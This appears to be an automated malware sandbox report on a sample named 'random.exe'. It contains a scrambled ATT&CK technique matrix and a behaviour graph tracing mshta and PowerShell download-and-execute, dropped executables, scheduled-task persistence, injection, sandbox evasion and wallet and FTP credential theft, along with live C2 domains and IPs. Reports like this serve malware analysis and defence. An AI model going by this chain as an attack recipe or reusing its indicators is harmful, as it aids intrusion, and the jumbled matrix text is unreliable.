Command and Control: 12 Ingress Tool Transfer; 11 Encrypted Channel; 3 Non-Application Layer Protocol
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration
Impact: 1 System Shutdown/Reboot; Network Denial of Service; Data Encrypted for Impact
                                    33
                                    Software Packing
                                    NTDS2410
                                    System Information Discovery
                                    Distributed Component Object Model21
                                    Input Capture
                                    124
                                    Application Layer Protocol
                                    Traffic DuplicationData Destruction
                                    Gather Victim Network InformationServerCloud Accounts2
                                    PowerShell
                                    2
                                    Registry Run Keys / Startup Folder
                                    212
                                    Process Injection
                                    1
                                    Timestomp
                                    LSA Secrets1191
                                    Security Software Discovery
                                    SSH3
                                    Clipboard Data
                                    Fallback ChannelsScheduled TransferData Encrypted for Impact
                                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts11
                                    Scheduled Task/Job
                                    1
                                    DLL Side-Loading
                                    Cached Domain Credentials571
                                    Virtualization/Sandbox Evasion
                                    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items2
                                    Registry Run Keys / Startup Folder
                                    111
                                    Masquerading
                                    DCSync4
                                    Process Discovery
                                    Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job2
                                    Valid Accounts
                                    Proc Filesystem11
                                    Application Window Discovery
                                    Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt571
                                    Virtualization/Sandbox Evasion
                                    /etc/passwd and /etc/shadow1
                                    System Owner/User Discovery
                                    Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                                    IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron21
                                    Access Token Manipulation
                                    Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                                    Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd212
                                    Process Injection
                                    Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                                    Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task1
                                    Mshta
                                    KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking
Legend:

• Process
• Signature
• Created File
• DNS/IP Info
• Is Dropped
• Is Windows Process
• Number of created Registry Values
• Number of created Files
• Visual Basic
• Delphi
• Java
• .Net C# or VB.NET
• C, C++ or other language
• Is malicious
• Internet
Behavior Graph ID: 1632643, Sample: random.exe, Startdate: 08/03/2025, Architecture: WINDOWS, Score: 100 (graph nodes listed as text; node numbers distinguish processes with the same name)

Start (node 2):
• DNS/IP: garagedrootz.top; arisechairedd.shop; 5 other IPs or domains
• Signatures: Suricata IDS alerts for network traffic; Found malware configuration; Antivirus detection for URL or domain; 32 other signatures
• Started: random.exe (node 15); rapes.exe (node 19); mshta.exe (node 21); 5 other processes (node 23)

random.exe (node 15):
• Dropped: C:\Users\user\AppData\Local\...\tmxzSk7p3.hta (HTML)
• Signatures: Binary is likely a compiled AutoIt script file; Found API chain indicative of sandbox detection; Creates HTA files
• Started: mshta.exe (node 26); cmd.exe (node 29)

rapes.exe (node 19):
• Signatures: Multi AV Scanner detection for dropped file; Detected unpacking (changes PE section rights); Contains functionality to start a terminal service; 2 other signatures

mshta.exe (node 21):
• Signatures: Suspicious powershell command line found; Tries to download and execute files (via powershell)
• Started: powershell.exe (node 31)

5 other processes (node 23):
• DNS/IP: 127.0.0.1 unknown unknown
• Signatures: Hides threads from debuggers; Tries to detect sandboxes / dynamic malware analysis system (registry check); Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

mshta.exe (node 26):
• Signatures: Suspicious powershell command line found; Tries to download and execute files (via powershell)
• Started: powershell.exe (node 33)

cmd.exe (node 29):
• Signatures: Drops PE files with a suspicious file extension; Uses schtasks.exe or at.exe to add and modify task schedules
• Started: conhost.exe (node 38); schtasks.exe (node 40)

powershell.exe (node 31):
• Started: TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE (node 42); conhost.exe (node 44)

powershell.exe (node 33):
• DNS/IP: 176.113.115.7, ports 49709, 49796, 49800, SELECTELRU, Russian Federation
• Dropped: TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE (PE32)
• Signatures: Found many strings related to Crypto-Wallets (likely being stolen); Powershell drops PE file
• Started: TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE (node 46); conhost.exe (node 50)

TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE (node 42):
• Signatures: Contains functionality to start a terminal service; Hides threads from debuggers; Tries to detect sandboxes / dynamic malware analysis system (registry check); Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE (node 46):
• Dropped: C:\Users\user\AppData\Local\...\rapes.exe (PE32)
• Signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Detected unpacking (changes PE section rights); 6 other signatures
• Started: rapes.exe (node 52)

rapes.exe (node 52):
• DNS/IP: 176.113.115.6, ports 49715, 49722, 49723, SELECTELRU, Russian Federation
• Dropped: C:\Users\user\AppData\Local\...\PfOHmro.exe (PE32); C:\Users\user\AppData\Local\...\mAtJWNv.exe (PE32); C:\Users\user\AppData\Local\...\CgmaT61.exe (PE32); 13 other malicious files
• Signatures: Contains functionality to start a terminal service; Hides threads from debuggers; Tries to detect sandboxes / dynamic malware analysis system (registry check); Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
• Started: V0Bt74c.exe (node 57); ReK7Ewx.exe (node 60)

V0Bt74c.exe (node 57):
• Signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines); Injects a PE file into a foreign processes
• Started: V0Bt74c.exe (node 62); V0Bt74c.exe (node 66); WerFault.exe (node 68)

ReK7Ewx.exe (node 60):
• Started: cmd.exe (node 70)

V0Bt74c.exe (node 62):
• DNS/IP: garagedrootz.top 104.21.16.1, port 443 (local ports 49809, 49814), CLOUDFLARENETUS, United States; begindecafer.world 188.114.97.3, port 443 (local ports 49801, 49805), CLOUDFLARENETUS, European Union
• Signatures: Query firmware table information (likely to detect VMs); Found many strings related to Crypto-Wallets (likely being stolen); Tries to harvest and steal ftp login credentials; 2 other signatures

cmd.exe (node 70):
• Dropped: C:\Users\user\AppData\...\Occupation.com (PE32)
• Started: Occupation.com (node 73); conhost.exe (node 77); expand.exe (node 79); 10 other processes (node 81)

Occupation.com (node 73):
• Dropped: C:\Users\user\AppData\Local\...\RegAsm.exe (PE32); C:\Users\user\AppData\...duGeniusX.com (PE32); C:\Users\user\AppData\Local\...duGeniusX.js (ASCII)
• Signatures: Drops PE files with a suspicious file extension; Writes to foreign memory regions; Injects a PE file into a foreign processes
• Started: cmd.exe (node 83); cmd.exe (node 86)

cmd.exe (node 83):
• Dropped: C:\Users\user\AppData\...duGeniusX.url (MS)

cmd.exe (node 86):
• Started: conhost.exe (node 88)

                                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.